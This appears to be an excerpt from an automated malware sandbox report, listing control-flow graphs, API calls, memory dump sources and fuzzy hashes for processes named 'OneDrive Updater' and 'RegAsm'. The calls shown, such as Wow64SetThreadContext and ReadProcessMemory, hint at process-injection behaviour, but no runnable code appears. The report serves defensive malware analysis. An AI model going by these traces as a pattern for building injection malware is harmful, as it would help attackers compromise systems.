                                    • Instruction ID: 71266aa8dd29435911b8a4bcf6d81b1e82354f36817802bf69ba5180ad04d44f
                                    • Opcode Fuzzy Hash: e225628a027576e3e609ffb5633c90e9f0ee24f7b52c578f0fdb78acbbf5d3df
                                    • Instruction Fuzzy Hash: 7921E2B59002199FDB10CF9AD884ADEBBF4FB48350F10842AE958A7250C378A944CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 219 1051acc-10530d8 221 10530e4-1053110 Wow64SetThreadContext 219->221 222 10530da-10530e2 219->222 223 1053112-1053118 221->223 224 1053119-105313a 221->224 222->221 223->224
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,01052A1C), ref: 01053103
                                    Memory Dump Source
                                    • Source File: 00000037.00000002.2066184092.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_55_2_1050000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: 2ab4cb7e0ceb003111f1266e688df7e8b096222cd5582ad365e4b5491c61b83d
                                    • Instruction ID: 85bf152c3464027b02ec5a7d91d48520e8e84d83a9cc5a636268436388bb00e5
                                    • Opcode Fuzzy Hash: 2ab4cb7e0ceb003111f1266e688df7e8b096222cd5582ad365e4b5491c61b83d
                                    • Instruction Fuzzy Hash: 7A1126B19003498FDB50CFAAC844BDEFBF4FB88360F148069E958A7240D378A545CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 226 1051ed4-10530d8 228 10530e4-1053110 Wow64SetThreadContext 226->228 229 10530da-10530e2 226->229 230 1053112-1053118 228->230 231 1053119-105313a 228->231 229->228 230->231
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,01052A1C), ref: 01053103
                                    Memory Dump Source
                                    • Source File: 00000037.00000002.2066184092.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_55_2_1050000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: ac30534860f6a6f6e20ca3dcec5003dcb7cfcd4c9b3c3fa8d64393fb9291ffa8
                                    • Instruction ID: 199d75f1341bcd0fa6b7fc3e2428880a9d84b02a27cca6ffb7ffbb6e6698a830
                                    • Opcode Fuzzy Hash: ac30534860f6a6f6e20ca3dcec5003dcb7cfcd4c9b3c3fa8d64393fb9291ffa8
                                    • Instruction Fuzzy Hash: 271114B19003498FDB50CFAAC848BDEBBF4FB88360F148469E958A7240D378A545CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 233 105314c-10531ce ReadProcessMemory 234 10531d7-10531f8 233->234 235 10531d0-10531d6 233->235 235->234
                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,00010002,?,?,?,?,?,?,01052A5A,?,00000004,?), ref: 010531C1
                                    Memory Dump Source
                                    • Source File: 00000037.00000002.2066184092.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_55_2_1050000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID:
                                    • API String ID: 1726664587-0
                                    • Opcode ID: e26ce9355092312d09f98e84c51202b332418282f7ad0b75661569f014d2ccb9
                                    • Instruction ID: 35494afe9f2731aaa74b1fc1d84ea8fb42811989fa12364e50a6b4d1156f9310
                                    • Opcode Fuzzy Hash: e26ce9355092312d09f98e84c51202b332418282f7ad0b75661569f014d2ccb9
                                    • Instruction Fuzzy Hash: 0421E0B59003599FDB10CF9AD884ADEBBF4FB08360F10842AE958A7250D378A944CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 237 1053096-10530d8 238 10530e4-1053110 Wow64SetThreadContext 237->238 239 10530da-10530e2 237->239 240 1053112-1053118 238->240 241 1053119-105313a 238->241 239->238 240->241
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,01052A1C), ref: 01053103
                                    Memory Dump Source
                                    • Source File: 00000037.00000002.2066184092.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_55_2_1050000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: 3979578be21585d552a8ab35c553bdf631ce04f8ae5b71bbdda514016e0b398c
                                    • Instruction ID: 8bbd09f09d82863bd0f8dcbd7ad53a704bcd02aa3a9bd8869df8722599680705
                                    • Opcode Fuzzy Hash: 3979578be21585d552a8ab35c553bdf631ce04f8ae5b71bbdda514016e0b398c
                                    • Instruction Fuzzy Hash: 091134B2D002498FDB10CFAAC944BDEFBF5BB88320F14806AD468A7200D3389545CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 294 eed3c8-eed3da 295 eed46e-eed475 294->295 296 eed3e0 294->296 297 eed3e2-eed3ee 295->297 296->297 298 eed47a-eed47f 297->298 299 eed3f4-eed416 297->299 298->299 301 eed418-eed436 299->301 302 eed484-eed499 299->302 305 eed43e-eed44e 301->305 306 eed450-eed458 302->306 305->306 307 eed4a6 305->307 308 eed45a-eed46b 306->308 309 eed49b-eed4a4 306->309 309->308
                                    Memory Dump Source
                                    • Source File: 00000037.00000002.2062062297.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_55_2_eed000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5b0aeb102512a483a688e5d4ab12f98bdce0755221f3617b29ff182420e77c06
                                    • Instruction ID: 2fe69c6438ea63d35bab216c1cac83ee68e8aaf660adefd713fe7fafe70dc900
                                    • Opcode Fuzzy Hash: 5b0aeb102512a483a688e5d4ab12f98bdce0755221f3617b29ff182420e77c06
                                    • Instruction Fuzzy Hash: CA216A71108288DFCB11DF15DDC0B16BFA5FBA4314F20C169E8091B296C336E856C7A1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 311 eed4b4-eed4c6 312 eed4cc 311->312 313 eed55a-eed561 311->313 314 eed4ce-eed4da 312->314 313->314 316 eed566-eed56b 314->316 317 eed4e0-eed502 314->317 316->317 318 eed504-eed522 317->318 319 eed570-eed585 317->319 321 eed52a-eed53a 318->321 323 eed53c-eed544 319->323 321->323 324 eed592 321->324 325 eed546-eed557 323->325 326 eed587-eed590 323->326 326->325
                                    Memory Dump Source
                                    • Source File: 00000037.00000002.2062062297.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_55_2_eed000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1b0ee5ff8910bf63d93efd240467d1969e6cbe2102d978ef97420c97cc2441e0
                                    • Instruction ID: fc632d182aa39a69473051f12f6f596364ef0f55aa31a4cce2c1ea6cc6a3fd4f
                                    • Opcode Fuzzy Hash: 1b0ee5ff8910bf63d93efd240467d1969e6cbe2102d978ef97420c97cc2441e0
                                    • Instruction Fuzzy Hash: 842137B1508288DFDB05DF14DDC0B2BBF65FB98328F20C569E8095B256C336D85ACBA1
                                    Memory Dump Source
                                    • Source File: 00000037.00000002.2062062297.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_55_2_eed000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                    • Instruction ID: 16bd022370e954023572396c8b2fbbc8f706a4badac86fb3a918ecfe133da825
                                    • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                    • Instruction Fuzzy Hash: 4111E676504284CFCB16CF14D9C4B16BF71FB94328F24C5A9DC094B656C336D85ACBA1
                                    Memory Dump Source
                                    • Source File: 00000037.00000002.2062062297.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_55_2_eed000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                    • Instruction ID: 60a3b1e264e63066d77c54a80363c70aa94db77b6066b1729f7e5eeed44aecc6
                                    • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                    • Instruction Fuzzy Hash: E411D676504284CFDB15CF10D9C4B16BF71FBA4324F24C5A9D8094B656C336D45ACB91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 295 114c000-114c00f 296 114c011-114c01e call 114af60 295->296 297 114c03b-114c03f 295->297 302 114c034 296->302 303 114c020-114c02e call 114c698 296->303 299 114c041-114c04b 297->299 300 114c053-114c094 297->300 299->300 306 114c096-114c09e 300->306 307 114c0a1-114c0af 300->307 302->297 303->302 313 114c170-114c230 303->313 306->307 308 114c0b1-114c0b6 307->308 309 114c0d3-114c0d5 307->309 311 114c0c1 308->311 312 114c0b8-114c0bf call 114af6c 308->312 314 114c0d8-114c0df 309->314 316 114c0c3-114c0d1 311->316 312->316 346 114c232-114c235 313->346 347 114c238-114c263 GetModuleHandleW 313->347 317 114c0e1-114c0e9 314->317 318 114c0ec-114c0f3 314->318 316->314 317->318 320 114c0f5-114c0fd 318->320 321 114c100-114c109 call 114af7c 318->321 320->321 326 114c116-114c11b 321->326 327 114c10b-114c113 321->327 328 114c11d-114c124 326->328 329 114c139-114c146 326->329 327->326 328->329 331 114c126-114c136 call 114af8c call 114af9c 328->331 336 114c148-114c166 329->336 337 114c169-114c16f 329->337 331->329 336->337 346->347 348 114c265-114c26b 347->348 349 114c26c-114c280 347->349 348->349
                                    Memory Dump Source
                                    • Source File: 00000038.00000002.2074338111.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_56_2_1140000_RegAsm.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: 408ad514351a990af754f38d673d521a16ecd0a34ca5bdfb2436268967d0baa9
                                    • Instruction ID: 0890f6b4ec3c35f484bb91b63a9670bfcc816317d80e6ebe2a07400d9d60d8e9
                                    • Opcode Fuzzy Hash: 408ad514351a990af754f38d673d521a16ecd0a34ca5bdfb2436268967d0baa9
                                    • Instruction Fuzzy Hash: 0F7148B0A01B058FD728DF6AD44475ABBF1FF48B04F008A2DD48ADBA50DB75E845CB91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 352 1147364-114736c 353 1147370-1147431 CreateActCtxA 352->353 355 1147433-1147439 353->355 356 114743a-1147494 353->356 355->356 363 1147496-1147499 356->363 364 11474a3-11474a7 356->364 363->364 365 11474b8 364->365 366 11474a9-11474b5 364->366 368 11474b9 365->368 366->365 368->368
                                    APIs
                                    • CreateActCtxA.KERNEL32(?), ref: 01147421
                                    Memory Dump Source
                                    • Source File: 00000038.00000002.2074338111.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_56_2_1140000_RegAsm.jbxd
                                    Similarity
                                    • API ID: Create
                                    • String ID:
                                    • API String ID: 2289755597-0
                                    • Opcode ID: a694d0e145313b8438bfbe909bdff27c8e4ce52aa38b8644b53dfd136e4b0347
                                    • Instruction ID: d3c9e2fae864085e12028589140dc989b2d2f2316e9af03163abcaffa6d39cdd
                                    • Opcode Fuzzy Hash: a694d0e145313b8438bfbe909bdff27c8e4ce52aa38b8644b53dfd136e4b0347
                                    • Instruction Fuzzy Hash: D041F2B0C00719CFDB28CFA9C844B9DBBB5BF49704F24806AD408AB264DB756985CF90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 369 1146414-1147431 CreateActCtxA 372 1147433-1147439 369->372 373 114743a-1147494 369->373 372->373 380 1147496-1147499 373->380 381 11474a3-11474a7 373->381 380->381 382 11474b8 381->382 383 11474a9-11474b5 381->383 385 11474b9 382->385 383->382 385->385
                                    APIs
                                    • CreateActCtxA.KERNEL32(?), ref: 01147421
                                    Memory Dump Source
                                    • Source File: 00000038.00000002.2074338111.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_56_2_1140000_RegAsm.jbxd
                                    Similarity
                                    • API ID: Create
                                    • String ID:
                                    • API String ID: 2289755597-0
                                    • Opcode ID: 160d4ca9acaff4031eb5271aa34e73b116bb48023579dba1f0fdda6df3431e74
                                    • Instruction ID: ff46c973c2fd6d782297fd17bcba69cac2d878fa9ba406b4678d2a6ef24d229e
                                    • Opcode Fuzzy Hash: 160d4ca9acaff4031eb5271aa34e73b116bb48023579dba1f0fdda6df3431e74
                                    • Instruction Fuzzy Hash: CB41E0B0C00619CFDB28CFA9C844B9EBBB5BF48704F24806AD408AB265DB756985CF91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 386 1146780-1146783 388 1146788-114681c DuplicateHandle 386->388 389 1146825-1146842 388->389 390 114681e-1146824 388->390 390->389
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0114674E,?,?,?,?,?), ref: 0114680F
                                    Memory Dump Source
                                    • Source File: 00000038.00000002.2074338111.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_56_2_1140000_RegAsm.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: 5cf10a9294af93865ee8e4144223e71db20db211a31b1d15a6bb89818ba3633b
                                    • Instruction ID: 64ca222760125d51438581253ee4f3e77a058f64669d7d6f9fc8bc7cbec9ccd3
                                    • Opcode Fuzzy Hash: 5cf10a9294af93865ee8e4144223e71db20db211a31b1d15a6bb89818ba3633b
                                    • Instruction Fuzzy Hash: 752103B5D00248DFDB14CFAAD984AEEBFF8EB48324F14841AE914A3310D374A940CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 393 114611c-114681c DuplicateHandle 395 1146825-1146842 393->395 396 114681e-1146824 393->396 396->395
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0114674E,?,?,?,?,?), ref: 0114680F
                                    Memory Dump Source
                                    • Source File: 00000038.00000002.2074338111.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_56_2_1140000_RegAsm.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: 80e5c9140afe9af3493ea226746ce9c4d05b2e8274b2fea7c3ec03ae0d05b400
                                    • Instruction ID: 93b07587a8fbe796d473b8d8cb85f1a24de0f741faf5d62280a74edd0f9d1dcc
                                    • Opcode Fuzzy Hash: 80e5c9140afe9af3493ea226746ce9c4d05b2e8274b2fea7c3ec03ae0d05b400
                                    • Instruction Fuzzy Hash: 1E2103B5900248DFDB10CFAAD984ADEBFF4EB48324F14841AE918A7310D378A940CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 399 114c294-114c8b8 401 114c8c0-114c8ef LoadLibraryExW 399->401 402 114c8ba-114c8bd 399->402 403 114c8f1-114c8f7 401->403 404 114c8f8-114c915 401->404 402->401 403->404
                                    APIs
                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0114C6D1,00000800,00000000,00000000), ref: 0114C8E2
                                    Memory Dump Source
                                    • Source File: 00000038.00000002.2074338111.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_56_2_1140000_RegAsm.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 62a9c9efcc4982149b44cceb0f418cbfe45a5f58bf9975865d784b083f4bf2ce
                                    • Instruction ID: 87b18c96ebb594e9f708a3752fecd5c590e38d999d5965cb54b3353739994a0a
                                    • Opcode Fuzzy Hash: 62a9c9efcc4982149b44cceb0f418cbfe45a5f58bf9975865d784b083f4bf2ce
                                    • Instruction Fuzzy Hash: 191103B69003499FDB14CF9AD444A9EFBF4EB48720F14842AD919B7210C375A544CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 407 114af60-114c230 409 114c232-114c235 407->409 410 114c238-114c263 GetModuleHandleW 407->410 409->410 411 114c265-114c26b 410->411 412 114c26c-114c280 410->412 411->412
                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0114C01C), ref: 0114C256
                                    Memory Dump Source
                                    • Source File: 00000038.00000002.2074338111.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_56_2_1140000_RegAsm.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: 8a82c1f7fcb51d1c00fd9c4435f430dad2b159c8cdd0a99f2db3571200a77ea6
                                    • Instruction ID: ad84477be84f7673fb293bbb58c3392b3dff95e4254e06782b7c98a936dc36ff
                                    • Opcode Fuzzy Hash: 8a82c1f7fcb51d1c00fd9c4435f430dad2b159c8cdd0a99f2db3571200a77ea6
                                    • Instruction Fuzzy Hash: F91120B58002498BCB18CF9AC444B9EFBF4AB88624F10842AD919B7210C3B5A545CFA5
                                    Memory Dump Source
                                    • Source File: 00000038.00000002.2071407373.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_56_2_105d000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 80efc8f882f52fb11224813f66fd9f35f144fd1d667b5413262d3ab02d376d4c
                                    • Instruction ID: fad7dac18d2fab7d06a36a46b28b56f3ee9ef6dec219db4df9437659b41661c5
                                    • Opcode Fuzzy Hash: 80efc8f882f52fb11224813f66fd9f35f144fd1d667b5413262d3ab02d376d4c
                                    • Instruction Fuzzy Hash: A9212571500200DFDB45DF98D9C4B2BBFA5FB8831CF2485AADD494B216C336D456CBA2
                                    Memory Dump Source
                                    • Source File: 00000038.00000002.2072297827.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_56_2_106d000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fd84ec1f20cca06a8701c4f0afcd3a85387a7ef471344e773cf9bd6f08e21658
                                    • Instruction ID: 0538a9500e6572dbb0804a1f0e613110fb831b5b881a5de3d9c152101fbfb688
                                    • Opcode Fuzzy Hash: fd84ec1f20cca06a8701c4f0afcd3a85387a7ef471344e773cf9bd6f08e21658
                                    • Instruction Fuzzy Hash: 03214270204200DFEB11DF58D980B2ABFA9EB84314F20C5ADE8C94B246C33AC447CBA1
                                    Memory Dump Source
                                    • Source File: 00000038.00000002.2072297827.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_56_2_106d000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2150fcba881ef0c6bfcaadb8d2eb3c72bc8408d4ebbc8c4d626157ed0a284fdc
                                    • Instruction ID: 5ce449c8d2257d684d192d23ca73be40598b86abc3a0f606c6a6d1c53e5e58c2
                                    • Opcode Fuzzy Hash: 2150fcba881ef0c6bfcaadb8d2eb3c72bc8408d4ebbc8c4d626157ed0a284fdc
                                    • Instruction Fuzzy Hash: 802192755093808FDB13CF64D994B15BFB1EB46214F28C5DAD8898F667C33A980ACB62
                                    Memory Dump Source
                                    • Source File: 00000038.00000002.2071407373.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_56_2_105d000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ce69cba98bfff612cefda2c4877fe7df6cc59bd7a6ce96c012d28fad0f514114
                                    • Instruction ID: 7518c35c8964c99ecdf7110105d52660a6dfdf3b72cb5d5fd4410e61d730d49b
                                    • Opcode Fuzzy Hash: ce69cba98bfff612cefda2c4877fe7df6cc59bd7a6ce96c012d28fad0f514114
                                    • Instruction Fuzzy Hash: E0110372404280CFDB46CF44D9C4B16BFB1FB84318F24C6AADD490B216C33AD45ACBA1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 7ff6d68b85c0-7ff6d68b86a3 call 7ff6d68ae3d0 call 7ff6d68ad340 5 7ff6d68b86a5-7ff6d68b86c4 call 7ff6d68a14f0 0->5 6 7ff6d68b86c9-7ff6d68b86d8 0->6 5->6 7 7ff6d68b86de-7ff6d68b873b wcslen 6->7 8 7ff6d68b9beb-7ff6d68b9c65 6->8 10 7ff6d68b8766-7ff6d68b876d 7->10 11 7ff6d68b873d-7ff6d68b8761 call 7ff6d68a14f0 7->11 13 7ff6d68b876f-7ff6d68b87cf 10->13 14 7ff6d68b87d7-7ff6d68b8897 call 7ff6d68a40ab call 7ff6d68a3360 call 7ff6d68a3c50 memset 10->14 11->10 13->14 21 7ff6d68b88c9-7ff6d68b88e1 14->21 22 7ff6d68b8899-7ff6d68b88c4 call 7ff6d68a14f0 14->22 24 7ff6d68b88e3-7ff6d68b8924 21->24 25 7ff6d68b892c-7ff6d68b8959 21->25 22->21 24->25 26 7ff6d68b8984-7ff6d68b898b 25->26 27 7ff6d68b895b-7ff6d68b897f call 7ff6d68a14f0 25->27 29 7ff6d68b898d-7ff6d68b89c4 26->29 30 7ff6d68b89cc-7ff6d68b8a27 call 7ff6d68a2b30 call 7ff6d68a2b00 memset 26->30 27->26 29->30 35 7ff6d68b8a59-7ff6d68b8a60 30->35 36 7ff6d68b8a29-7ff6d68b8a54 call 7ff6d68a14f0 30->36 38 7ff6d68b8a62-7ff6d68b8a94 35->38 39 7ff6d68b8a9b-7ff6d68b8b3f call 7ff6d68a2b00 memset 35->39 36->35 38->39 42 7ff6d68b8b71-7ff6d68b8b78 39->42 43 7ff6d68b8b41-7ff6d68b8b6c call 7ff6d68a14f0 39->43 45 7ff6d68b8c40-7ff6d68b8cc9 call 7ff6d68a2b00 memset 42->45 46 7ff6d68b8b7e-7ff6d68b8c38 42->46 43->42 49 7ff6d68b8cfb-7ff6d68b8d0a 45->49 50 7ff6d68b8ccb-7ff6d68b8cf6 call 7ff6d68a14f0 45->50 46->45 52 7ff6d68b8d10-7ff6d68b8d8e 49->52 53 7ff6d68b8d96-7ff6d68b8dc3 49->53 50->49 52->53 54 7ff6d68b8dee-7ff6d68b8df5 53->54 55 7ff6d68b8dc5-7ff6d68b8de9 call 7ff6d68a14f0 53->55 56 7ff6d68b8df7-7ff6d68b8e25 54->56 57 7ff6d68b8e2c-7ff6d68b8e96 call 7ff6d68a2b30 call 7ff6d68a2b00 memset 54->57 55->54 56->57 63 7ff6d68b8ec8-7ff6d68b8ed7 57->63 64 7ff6d68b8e98-7ff6d68b8ec3 call 7ff6d68a14f0 57->64 66 7ff6d68b8f39-7ff6d68b8f66 63->66 67 7ff6d68b8ed9-7ff6d68b8f31 63->67 64->63 68 7ff6d68b8f91-7ff6d68b8f98 66->68 69 7ff6d68b8f68-7ff6d68b8f8c call 7ff6d68a14f0 66->69 67->66 71 7ff6d68b8fcf-7ff6d68b902f call 7ff6d68a2b30 call 7ff6d68a2b00 memset 68->71 72 7ff6d68b8f9a-7ff6d68b8fc8 68->72 69->68 77 7ff6d68b9061-7ff6d68b9068 71->77 78 7ff6d68b9031-7ff6d68b905c call 7ff6d68a14f0 71->78 72->71 80 7ff6d68b90a3-7ff6d68b9109 call 7ff6d68a2b00 memset 77->80 81 7ff6d68b906a-7ff6d68b909c 77->81 78->77 84 7ff6d68b913b-7ff6d68b9142 80->84 85 7ff6d68b910b-7ff6d68b9136 call 7ff6d68a14f0 80->85 81->80 87 7ff6d68b9144-7ff6d68b91a0 84->87 88 7ff6d68b91a8-7ff6d68b91cd call 7ff6d68a2b00 call 7ff6d68a1ea0 84->88 85->84 87->88 93 7ff6d68b91cf-7ff6d68b91f5 call 7ff6d68a14f0 88->93 94 7ff6d68b91fa-7ff6d68b9201 88->94 93->94 96 7ff6d68b9203-7ff6d68b9222 94->96 97 7ff6d68b922a-7ff6d68b9292 94->97 96->97 98 7ff6d68b9294-7ff6d68b92b8 call 7ff6d68a14f0 97->98 99 7ff6d68b92bd-7ff6d68b92c4 97->99 98->99 101 7ff6d68b936c-7ff6d68b93fb call 7ff6d68a3010 99->101 102 7ff6d68b92ca-7ff6d68b9364 99->102 105 7ff6d68b9400-7ff6d68b9416 call 7ff6d68a4051 101->105 102->101 108 7ff6d68b9418-7ff6d68b9432 call 7ff6d68a14f0 105->108 109 7ff6d68b9437-7ff6d68b943e 105->109 108->109 111 7ff6d68b9440-7ff6d68b9453 109->111 112 7ff6d68b9457-7ff6d68b9464 _wcsicmp 109->112 111->112 113 7ff6d68b9740-7ff6d68b9743 call 7ff6d68a2a50 112->113 114 7ff6d68b946a-7ff6d68b946f 112->114 117 7ff6d68b9748-7ff6d68b974b 113->117 114->113 115 7ff6d68b9475-7ff6d68b947a call 7ff6d68a3310 114->115 119 7ff6d68b947f-7ff6d68b948b 115->119 120 7ff6d68b9752-7ff6d68b9773 memcpy 117->120 119->120 121 7ff6d68b9491-7ff6d68b9493 119->121 122 7ff6d68b9775-7ff6d68b97a1 memcpy call 7ff6d68a14f0 120->122 123 7ff6d68b97a6-7ff6d68b97ad 120->123 124 7ff6d68b949e-7ff6d68b94c2 memcpy 121->124 125 7ff6d68b9495-7ff6d68b9498 121->125 122->123 127 7ff6d68b991e-7ff6d68b992f call 7ff6d68a34f0 123->127 128 7ff6d68b97b3-7ff6d68b9916 123->128 129 7ff6d68b94ef-7ff6d68b94f6 124->129 130 7ff6d68b94c4-7ff6d68b94ea memcpy call 7ff6d68a14f0 124->130 125->105 125->124 138 7ff6d68b9931-7ff6d68b9933 127->138 139 7ff6d68b9939-7ff6d68b995d memcpy 127->139 128->127 132 7ff6d68b9657-7ff6d68b9689 call 7ff6d68a2990 129->132 133 7ff6d68b94fc-7ff6d68b9650 129->133 130->129 140 7ff6d68b968f-7ff6d68b9699 132->140 141 7ff6d68b9bcc-7ff6d68b9be6 call 7ff6d68a31c0 132->141 133->132 138->105 138->139 142 7ff6d68b995f-7ff6d68b9989 memcpy call 7ff6d68a14f0 139->142 143 7ff6d68b998e-7ff6d68b9995 139->143 145 7ff6d68b96d0-7ff6d68b96d7 140->145 146 7ff6d68b969b-7ff6d68b96cb call 7ff6d68a14f0 140->146 141->8 142->143 148 7ff6d68b99f7-7ff6d68b9a31 call 7ff6d68a2990 143->148 149 7ff6d68b9997-7ff6d68b999e 143->149 154 7ff6d68b9715-7ff6d68b9735 call 7ff6d68a2990 145->154 155 7ff6d68b96d9-7ff6d68b970e 145->155 146->145 159 7ff6d68b9a37-7ff6d68b9a8e 148->159 160 7ff6d68b9bad-7ff6d68b9bc7 call 7ff6d68a31c0 148->160 150 7ff6d68b99a0-7ff6d68b99c0 149->150 150->150 156 7ff6d68b99c2-7ff6d68b99ef 150->156 154->105 155->154 156->148 162 7ff6d68b9a90-7ff6d68b9b08 call 7ff6d68a14f0 159->162 163 7ff6d68b9b0d-7ff6d68b9b14 159->163 160->141 162->163 166 7ff6d68b9b16-7ff6d68b9b85 163->166 167 7ff6d68b9b8c-7ff6d68b9ba3 call 7ff6d68a2990 163->167 166->167 170 7ff6d68b9ba8 167->170 170->105
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000039.00000002.2918288244.00007FF6D68A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6D68A0000, based on PE: true
                                    • Associated: 00000039.00000002.2918207984.00007FF6D68A0000.00000002.00000001.01000000.00000000.sdmpDownload File
